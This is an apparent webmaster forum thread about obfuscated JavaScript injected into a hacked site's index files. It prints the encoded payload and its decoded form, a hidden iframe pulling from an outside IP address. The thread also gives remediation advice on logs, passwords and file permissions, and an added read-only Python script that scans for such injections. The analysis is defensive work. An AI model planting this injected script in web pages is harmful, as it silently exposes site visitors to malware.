I mean some motherfucker posted this script all over my site's index files:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%31%63%34%30%62%31%32%38%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%33%38%36%38%29%2b%27%66%62%39%36%64%5c%27%20%77%69%64%74%68%3d%35%37%37%20%68%65%69%67%68%74%3d%32%38%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%31%35%33%61%64%36%33%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%36%35%30%30%29%2b%27%35%34%36%38%39%33%37%66%30%5c%27%20%77%69%64%74%68%3d%33%38%36%20%68%65%69%67%68%74%3d%32%35%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
How can I translate them? And is that a host fault? I mean, how did he gain access to the index files? How do I protect myself in the future?
Check when your web files were modified, then look in your access_logs for anything odd during that timeframe, maybe backtrack a little. You should be able to see the request they made that made this possible; with that knowledge you can patch the exploit, or write a mod_security rule to prevent it in the future. Cheers.
Decoded the code, and this is what it looks like:
<script>eval(unescape("window.status='Done';document.write('<iframe name=f1c40b128 src=\'http://81.29.241.70/new/counter.php?'+Math.round(Math.random()*163868)+'fb96d\' width=577 height=284 style=\'display: none\'></iframe>')")); </script>
<script>eval(unescape("window.status='Done';document.write('<iframe name=9153ad63b src=\'http://81.29.241.70/new/counter.php?'+Math.round(Math.random()*96500)+'5468937f0\' width=386 height=250 style=\'display: none\'></iframe>')")); </script>
You'd better change your FTP password, make sure that no PHP/HTML file is chmoded to 777, and you'd better contact your server administrator about that.
Check your file permissions; it's a common mistake that you have to pay for if someone who wants to ruin your site detects it. I would strongly advise you to check all files and edit the permissions to more appropriate ones. Meti
The bastard hacked all my index files for all my websites. If I set the permissions of those to 777 the site will not work? What do you mean by checking the permissions?
The permissions, like the attributes/CHMOD; make sure they're not 777. If not, change all your passwords.
755 is the default folder setting. If you need to do some stuff such as uploading or enabling audio streaming from another website, then you will need 775. Never ever use jackpot (777). Programmers with advanced knowledge could easily break in using remote access. 777 means that you allow everyone to upload files and execute them, even if it is a dangerous one.
It uses JavaScript to redirect every single user who loads that page to a webpage that contains viruses. Use the link below to see. http://www.google.com/search?hl=en&...US:official&hs=A5P&q=81.29.241.70&btnG=Search
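An added example, not code from any poster in this thread: a small audit script that combines the checks suggested above. It walks a web root, decodes any `eval(unescape("%.."))` injection of the shape posted in the first message, and reports each affected or world-writable file with its mode and modification time (the time window to search in the access logs). The function names, the extension list and the `make_sample` helper are assumptions made for illustration.

```python
import os, re, stat, time
from urllib.parse import unquote

# Matches the injection shape seen in the thread: eval(unescape("%77%69..."))
INJECT_RE = re.compile(r'eval\(\s*unescape\(\s*"((?:%[0-9a-fA-F]{2})+)"\s*\)\s*\)')
# Pulls the src out of a decoded document.write('<iframe ... src=\'URL...')
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc=\\?['\"]?([^'\"\\\s>]+)", re.I)
WEB_EXT = (".html", ".htm", ".php", ".js")  # assumed list of files worth checking

def decode_injections(text):
    """Return the decoded body of every eval(unescape("%..")) call in text."""
    return [unquote(m.group(1), encoding="latin-1") for m in INJECT_RE.finditer(text)]

def audit_webroot(root):
    """Walk root; report injected files and world-writable files with mode and mtime."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXT):
                continue
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            with open(path, encoding="latin-1") as fh:
                decoded = decode_injections(fh.read())
            world_writable = bool(st.st_mode & stat.S_IWOTH)  # e.g. 777 or 666
            if decoded or world_writable:
                findings.append({
                    "path": path,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "world_writable": world_writable,
                    # UTC; compare against access_log entries around this time
                    "modified": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(st.st_mtime)),
                    "iframe_srcs": [s for d in decoded for s in IFRAME_SRC_RE.findall(d)],
                })
    return findings

def make_sample(js):
    """Constructed test input: percent-encode every byte of js, as the injection did."""
    encoded = "".join("%%%02x" % b for b in js.encode("latin-1"))
    return '<script>eval(unescape("%s")); </script>' % encoded

if __name__ == "__main__":
    import sys
    for finding in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

The script only reads files; cleaning the injected lines and fixing modes is left to the site owner once the entry point has been found in the logs.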